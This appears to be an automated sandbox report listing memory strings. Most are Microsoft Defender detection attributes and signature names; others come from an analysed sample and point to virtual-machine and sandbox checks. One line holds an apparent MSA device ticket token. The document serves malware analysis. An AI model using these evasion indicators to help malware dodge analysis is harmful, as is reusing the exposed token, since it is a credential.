Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *VMWARE*
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 0000000B.00000003.18282049510.0000021B5FE1E000.00000004.00000001.sdmp Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%*s%*s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 0000000B.00000003.18277582882.0000021B5E0B0000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: Vmware
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: mpam-728dfe11.exe, 00000011.00000003.18579337168.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp Binary or memory string: DefenderDetectionsNameURLSeverityCategoryCurrentStatusExecutionStatusInitialDetectionTimeLastThreatStatusChangeTimeNumberOfDetectionsHealthProductStatusComputerStateDefenderEnabledRtpEnabledNisEnabledQuickScanOverdueFullScanOverdueSignatureOutOfDateRebootRequiredFullScanRequiredEngineVersionSignatureVersionDefenderVersionQuickScanTimeFullScanTimeQuickScanSigVersionFullScanSigVersionTamperProtectionEnabledIsVirtualMachineConfigurationDeviceControlPolicyGroupsGroupDataPolicyRulesRuleDataTamperProtectionEnableFileHashComputationMeteredConnectionUpdatesSupportLogLocationExcludedIpAddressesAllowNetworkProtectionOnWinServerDisableCpuThrottleOnIdleScansDisableLocalAdminMergeSchedulerRandomizationTimeDisableTlsParsingDisableHttpParsingDisableDnsParsingDisableDnsOverTcpParsingDisableSshParsingPlatformUpdatesChannelEngineUpdatesChannelSecurityIntelligenceUpdatesChannelDisableGradualReleaseAllowNetworkProtectionDownLevelEnableDnsSinkholeDisableInboundConnectionFilteringDisableRdpParsingAllowDatagramProcessingOnWinServerDisableNetworkProtectionPerfTelemetryHideExclusionsFromLocalAdminsThrottleForScheduledScanOnlyASROnlyPerRuleExclusionsScanUpdateSignatureOfflineScan
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 0000000B.00000003.18282049510.0000021B5FE1E000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *QEMU*
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp Binary or memory string: Microsoft HvVMwareVMware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000012.00000003.19876584478.000002DF22A4B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWt}I
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 00000012.00000003.19876400291.000002DF22A3D000.00000004.00000001.sdmp Binary or memory string: MSA_DeviceTickett=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAcSsRKt8ps1HbU+lbYp62KgixIlLnT5xVNUYmFgiZg7e2RSZvAXtkprrlFEiwRIxYBAVaF+0TT0fAxlAdW7pw9KXidv+ux3QP60AShLSgmycklECD4sCMAJVWqoFsRVSZJqfKaMe5L1dYmadxAB7t31ooFXtm3d/lpFn6vSieVQtb0SzS853TB7AqJZh8haYOHJX+cICNMab9AkT9aSQwSXElnsrYFrBhdW2S1ft6gz+YJj6ES88XfslacRUeBvO77oe+Bdkb3KiNFT+XsLg8UbipcMNOJBt96fEgqnllnnNAW98GxQ+WhyNwRcoI1HGxzTzu8AWEfs1wQbp0+8jBQgDZgAACIIsM7dN3b6OiAGCDYOxAbrOsaEV3IcZ1xCkXY/qQfLMzT9URManm6tej5fX612VHGfSiV4E1T+NBPw1Ckf7emdhzWCDggO0AUcQcSnOKtmsSV8h9tM+Tz8YA1OPs9ZWToQybrqgo1rQJXGd1NSS+osFLxZ7BxUkTcBzS/aScuafnWMzTl/Z0Ql2YWMb18DDT2tf8WrjwdKUgQF2nKQXpuJwtfB6a+IwKvXvizLVJXlX2w3HJ9+toYseVazq/Ig1qncXi0OsWCA7j0Fd6V8EsnCUqmmv+0NPfzRZZqVhFCezKqJRce9/wONqhtRIOTPMPsl+wISiqhk0OHIOGnpwUzH+CdJwli4Np1dbFeCfqqd71a+2Ziib0guf16qWZ0Xu/Tl+OmyJ9X6klAK+WOMkwFun/YxVBEREUbu7jP2Gdjawu3U92BSzPk06Nzhi1WVrQxOtIM0op+50hB50FveUnB8PPzJ3Ir5xdNamO72ffDki+ZpTGWTPv3HhSw0U6r3NEx5poZUUT0cKfn6RxkEpNyyAi7YB&p=MSDW
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 0000000B.00000003.18321478947.0000021B5F112000.00000004.00000001.sdmp Binary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VMRS.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp Binary or memory string: virtual hd
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: MpSigStub.exe, 00000012.00000003.19875870940.000002DF229DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: *VMWARE*": IsVirtualPCPresent
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vmgs.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: IsVmWare]
